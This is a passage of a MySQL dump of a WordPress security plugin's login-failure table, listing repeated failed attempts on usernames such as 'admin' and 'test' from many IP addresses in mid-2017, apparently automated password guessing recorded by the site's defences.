(102364, 1498644941.645399, 1, 'loginFailValidUsername', 'admin', 1, 656968908, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102365, 1498645111.428206, 1, 'loginFailValidUsername', 'admin', 1, 2047384482, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102366, 1498645112.699972, 1, 'loginFailValidUsername', 'admin', 1, 2047384482, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102367, 1498645982.108344, 1, 'loginFailValidUsername', 'admin', 1, 1768625648, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102368, 1498645986.747734, 1, 'loginFailValidUsername', 'admin', 1, 1768625648, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102369, 1498648260.072504, 1, 'loginFailValidUsername', 'admin', 1, 996240175, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102370, 1498648262.358459, 1, 'loginFailValidUsername', 'admin', 1, 996240175, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102371, 1498652206.358432, 1, 'loginFailValidUsername', 'admin', 1, 3411510666, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102372, 1498652208.002624, 1, 'loginFailValidUsername', 'admin', 1, 3411510666, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102373, 1498652672.952715, 1, 'loginFailValidUsername', 'admin', 1, 2961990561, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102374, 1498652673.985579, 1, 'loginFailValidUsername', 'admin', 1, 2961990561, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102375, 1498654465.631309, 1, 'loginFailValidUsername', 'admin', 1, 1773706418, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102376, 1498654466.985643, 1, 'loginFailValidUsername', 'admin', 1, 1773706418, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102377, 1498660328.673319, 1, 'loginFailValidUsername', 'admin', 1, 3047297516, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102378, 1498660330.097509, 1, 'loginFailValidUsername', 'admin', 1, 3047297516, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102379, 1498665421.135244, 1, 'loginFailValidUsername', 'admin', 1, 1485079094, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102380, 1498665422.166740, 1, 'loginFailValidUsername', 'admin', 1, 1485079094, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102381, 1498665465.459857, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.10.67 (KHTML, like Gecko) Chrome/53.6.0992.5620 Safari/534.50'),
(102382, 1498667444.600617, 1, 'loginFailValidUsername', 'admin', 1, 2762002450, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102383, 1498667448.245292, 1, 'loginFailValidUsername', 'admin', 1, 2762002450, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102384, 1498670628.795583, 1, 'loginFailValidUsername', 'admin', 1, 532327828, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102385, 1498670630.694565, 1, 'loginFailValidUsername', 'admin', 1, 532327828, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102386, 1498671023.056899, 1, 'loginFailValidUsername', 'admin', 1, 1133404225, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102387, 1498673416.461168, 1, 'loginFailValidUsername', 'admin', 1, 3036568532, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102388, 1498673418.904772, 1, 'loginFailValidUsername', 'admin', 1, 3036568532, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102389, 1498676803.391858, 1, 'loginFailValidUsername', 'admin', 1, 2057456199, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102390, 1498676804.817681, 1, 'loginFailValidUsername', 'admin', 1, 2057456199, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102391, 1498679690.034125, 1, 'loginFailValidUsername', 'admin', 1, 2972444966, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102392, 1498679691.356498, 1, 'loginFailValidUsername', 'admin', 1, 2972444966, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102393, 1498681340.372706, 1, 'loginFailValidUsername', 'admin', 1, 2970133445, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102394, 1498681341.909259, 1, 'loginFailValidUsername', 'admin', 1, 2970133445, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102395, 1498682636.938534, 1, 'loginFailValidUsername', 'admin', 1, 690199419, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102396, 1498682645.189610, 1, 'loginFailValidUsername', 'admin', 1, 690199419, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102397, 1498688460.233047, 1, 'loginFailValidUsername', 'admin', 1, 2970975037, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102398, 1498688607.035809, 1, 'loginFailValidUsername', 'admin', 1, 2204950530, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102399, 1498688608.663611, 1, 'loginFailValidUsername', 'admin', 1, 2204950530, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102400, 1498689301.650388, 1, 'loginFailValidUsername', 'admin', 1, 3185120017, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102401, 1498690202.664396, 1, 'loginFailInvalidUsername', 'pour', 0, 3105930270, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102402, 1498690858.193113, 1, 'loginFailValidUsername', 'pablo', 3, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102403, 1498690860.017046, 1, 'loginFailInvalidUsername', 'vous', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102404, 1498690861.806926, 1, 'loginFailInvalidUsername', 'training', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102405, 1498690863.746675, 1, 'loginFailInvalidUsername', 'notre', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102406, 1498690865.551388, 1, 'loginFailInvalidUsername', 'pour', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102407, 1498690867.788825, 1, 'loginFailInvalidUsername', 'cross', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1');
INSERT INTO `www2_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(102408, 1498690869.611103, 1, 'loginFailInvalidUsername', 'objectifs', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102409, 1498690871.454729, 1, 'loginFailInvalidUsername', 'venez', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102410, 1498690873.465881, 1, 'loginFailInvalidUsername', 'outils', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102411, 1498690875.468181, 1, 'loginFailInvalidUsername', 'professionnel', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102412, 1498691064.397826, 1, 'loginFailValidUsername', 'admin', 1, 1096590283, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102413, 1498691065.454086, 1, 'loginFailValidUsername', 'admin', 1, 1096590283, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102414, 1498691319.089167, 1, 'loginFailValidUsername', 'admin', 1, 634530697, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102415, 1498691320.348231, 1, 'loginFailValidUsername', 'admin', 1, 634530697, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102416, 1498697011.708554, 1, 'loginFailValidUsername', 'admin', 1, 3135207294, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102417, 1498833916.722565, 1, 'loginFailInvalidUsername', 'test', 0, 2058679530, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102418, 1498833918.515638, 1, 'loginFailInvalidUsername', 'test', 0, 2058679530, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102419, 1498834235.045565, 1, 'loginFailInvalidUsername', 'test', 0, 2374447927, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102420, 1498834236.183964, 1, 'loginFailInvalidUsername', 'test', 0, 2374447927, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102421, 1498836670.163088, 1, 'loginFailInvalidUsername', 'test', 0, 3553507500, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102422, 1498836672.195536, 1, 'loginFailInvalidUsername', 'test', 0, 3553507500, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102423, 1498837594.295691, 1, 'loginFailInvalidUsername', 'test', 0, 3187941058, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102424, 1498837598.896228, 1, 'loginFailInvalidUsername', 'test', 0, 3187941058, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102425, 1498837972.160743, 1, 'loginFailInvalidUsername', 'test', 0, 2945059508, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102426, 1498837973.648749, 1, 'loginFailInvalidUsername', 'test', 0, 2945059508, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102427, 1498839943.265660, 1, 'loginFailInvalidUsername', 'test', 0, 3070175989, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102428, 1498839945.269605, 1, 'loginFailInvalidUsername', 'test', 0, 3070175989, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102429, 1498841036.794261, 1, 'loginFailInvalidUsername', 'test', 0, 1329042672, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102430, 1498842246.481495, 1, 'loginFailInvalidUsername', 'test', 0, 3583325044, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102431, 1498842247.450331, 1, 'loginFailInvalidUsername', 'test', 0, 3583325044, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102432, 1498842872.460232, 1, 'loginFailInvalidUsername', 'test', 0, 3075731299, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102433, 1498842873.681472, 1, 'loginFailInvalidUsername', 'test', 0, 3075731299, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102434, 1498844547.589649, 1, 'loginFailInvalidUsername', 'test', 0, 1329981114, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102435, 1498844549.082372, 1, 'loginFailInvalidUsername', 'test', 0, 1329981114, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102436, 1498845067.945971, 1, 'loginFailInvalidUsername', 'test', 0, 1423699707, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102437, 1498845068.932858, 1, 'loginFailInvalidUsername', 'test', 0, 1423699707, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102438, 1498849617.423562, 1, 'loginFailInvalidUsername', 'test', 0, 1240557990, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102439, 1498849618.719688, 1, 'loginFailInvalidUsername', 'test', 0, 1240557990, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102440, 1498849872.169094, 1, 'loginFailInvalidUsername', 'test', 0, 1267688388, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102441, 1498849873.298811, 1, 'loginFailInvalidUsername', 'test', 0, 1267688388, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102442, 1498852588.333825, 1, 'loginFailValidUsername', 'admin', 1, 1755459842, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102443, 1498852589.409323, 1, 'loginFailValidUsername', 'admin', 1, 1755459842, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102444, 1498854031.377332, 1, 'loginFailInvalidUsername', 'test', 0, 3315981465, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102445, 1498854073.795202, 1, 'loginFailInvalidUsername', 'test', 0, 1441124516, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102446, 1498854739.700527, 1, 'loginFailInvalidUsername', 'test', 0, 1849098465, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102447, 1498854741.830816, 1, 'loginFailInvalidUsername', 'test', 0, 1849098465, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102448, 1498854753.479541, 1, 'loginFailInvalidUsername', 'test', 0, 737914786, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102449, 1498854754.997522, 1, 'loginFailInvalidUsername', 'test', 0, 737914786, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102450, 1498856621.313104, 1, 'loginFailInvalidUsername', 'test', 0, 2908458748, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102451, 1498856622.700981, 1, 'loginFailInvalidUsername', 'test', 0, 2908458748, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102452, 1498856623.842255, 1, 'loginFailInvalidUsername', 'test', 0, 3145684820, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102453, 1498856625.332395, 1, 'loginFailInvalidUsername', 'test', 0, 3145684820, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102454, 1498856875.297914, 1, 'loginFailInvalidUsername', 'test', 0, 778261166, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102455, 1498856876.259537, 1, 'loginFailInvalidUsername', 'test', 0, 778261166, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102456, 1498857431.107553, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/532.88.35 (KHTML, like Gecko) Version/5.3.7 Safari/530.70'),
(102457, 1498867243.445853, 1, 'loginFailInvalidUsername', 'test', 0, 2577632674, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102458, 1498867244.991678, 1, 'loginFailInvalidUsername', 'test', 0, 2577632674, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102459, 1498868601.199881, 1, 'loginFailInvalidUsername', 'test', 0, 2963878449, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102460, 1498870628.204936, 1, 'loginFailInvalidUsername', 'test', 0, 3566655098, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102461, 1498870643.505292, 1, 'loginFailInvalidUsername', 'test', 0, 3566655098, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102462, 1498874972.062605, 1, 'loginFailInvalidUsername', 'test', 0, 3321294276, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102463, 1498874975.709285, 1, 'loginFailInvalidUsername', 'test', 0, 3321294276, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102464, 1498876860.061770, 1, 'loginFailInvalidUsername', 'test', 0, 3754817706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102465, 1498876861.655739, 1, 'loginFailInvalidUsername', 'test', 0, 3754817706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102466, 1498879565.494904, 1, 'loginFailInvalidUsername', 'test', 0, 2094473799, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102467, 1498883265.950297, 1, 'loginFailInvalidUsername', 'test', 0, 1776434590, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102468, 1498883267.453622, 1, 'loginFailInvalidUsername', 'test', 0, 1776434590, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102469, 1498884446.562962, 1, 'loginFailInvalidUsername', 'test', 0, 657088345, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102470, 1498884924.412673, 1, 'loginFailInvalidUsername', 'test', 0, 2898773830, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102471, 1498888306.309333, 1, 'loginFailInvalidUsername', 'test', 0, 657761155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102472, 1498888307.711233, 1, 'loginFailInvalidUsername', 'test', 0, 657761155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102473, 1498888960.379149, 1, 'loginFailInvalidUsername', 'test', 0, 2017199584, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102474, 1498888961.598289, 1, 'loginFailInvalidUsername', 'test', 0, 2017199584, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102475, 1498892197.772720, 1, 'loginFailInvalidUsername', 'test', 0, 3057766743, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102476, 1498892199.006866, 1, 'loginFailInvalidUsername', 'test', 0, 3057766743, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102477, 1498892447.517584, 1, 'loginFailInvalidUsername', 'test', 0, 1950958695, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102478, 1498892450.583994, 1, 'loginFailInvalidUsername', 'test', 0, 1950958695, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102479, 1498892541.320832, 1, 'loginFailInvalidUsername', 'test', 0, 1892205055, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102480, 1498892543.122016, 1, 'loginFailInvalidUsername', 'test', 0, 1892205055, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102481, 1498892634.073522, 1, 'loginFailInvalidUsername', 'test', 0, 1023600493, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102482, 1498892635.670287, 1, 'loginFailInvalidUsername', 'test', 0, 1023600493, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102483, 1498894925.036681, 1, 'loginFailInvalidUsername', 'test', 0, 461507676, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102484, 1498894926.711254, 1, 'loginFailInvalidUsername', 'test', 0, 461507676, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102485, 1498897342.826897, 1, 'loginFailInvalidUsername', 'test', 0, 3381475055, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102486, 1498897344.124940, 1, 'loginFailInvalidUsername', 'test', 0, 3381475055, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102487, 1498897793.045459, 1, 'loginFailInvalidUsername', 'test', 0, 3134639215, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102488, 1498897794.428281, 1, 'loginFailInvalidUsername', 'test', 0, 3134639215, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102489, 1498900870.311419, 1, 'loginFailInvalidUsername', 'test', 0, 1452261118, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102490, 1498901564.989569, 1, 'loginFailInvalidUsername', 'test', 0, 2076796947, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102491, 1498901566.215136, 1, 'loginFailInvalidUsername', 'test', 0, 2076796947, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102492, 1498902421.016520, 1, 'loginFailInvalidUsername', 'test', 0, 694234475, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102493, 1498904315.622748, 1, 'loginFailInvalidUsername', 'test', 0, 2058189926, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102494, 1498904317.183801, 1, 'loginFailInvalidUsername', 'test', 0, 2058189926, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102495, 1498904841.151801, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.91.38 (KHTML, like Gecko) Version/5.3.8 Safari/531.73'),
(102496, 1498904842.605162, 1, 'loginFailInvalidUsername', 'test', 0, 1848588273, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102497, 1498904844.058418, 1, 'loginFailInvalidUsername', 'test', 0, 1848588273, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102498, 1498912376.728349, 1, 'loginFailInvalidUsername', 'test', 0, 1317833414, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102499, 1498912716.830766, 1, 'loginFailInvalidUsername', 'test', 0, 1571556693, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102500, 1498912717.873928, 1, 'loginFailInvalidUsername', 'test', 0, 1571556693, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102501, 1498913399.113720, 1, 'loginFailValidUsername', 'admin', 1, 1979542344, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102502, 1498913624.631242, 1, 'loginFailInvalidUsername', 'test', 0, 1504999297, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102503, 1498913625.674891, 1, 'loginFailInvalidUsername', 'test', 0, 1504999297, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102504, 1498914095.838440, 1, 'loginFailInvalidUsername', 'test', 0, 1416601116, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102505, 1498914096.901950, 1, 'loginFailInvalidUsername', 'test', 0, 1416601116, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102506, 1498914978.342593, 1, 'loginFailInvalidUsername', 'test', 0, 3283233138, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102507, 1498914979.565343, 1, 'loginFailInvalidUsername', 'test', 0, 3283233138, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102508, 1498915344.698106, 1, 'loginFailInvalidUsername', '{login}', 0, 1835211794, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102509, 1498917256.377883, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3109159307, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102510, 1498919138.750403, 1, 'loginFailValidUsername', 'admin', 1, 1908535302, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102511, 1498920214.561732, 1, 'loginFailInvalidUsername', 'test', 0, 1569557062, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102512, 1498920216.255528, 1, 'loginFailInvalidUsername', 'test', 0, 1569557062, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102513, 1498921088.057668, 1, 'loginFailInvalidUsername', '{login}', 0, 1406152144, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102514, 1498922130.772930, 1, 'loginFailInvalidUsername', 'test', 0, 769478934, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
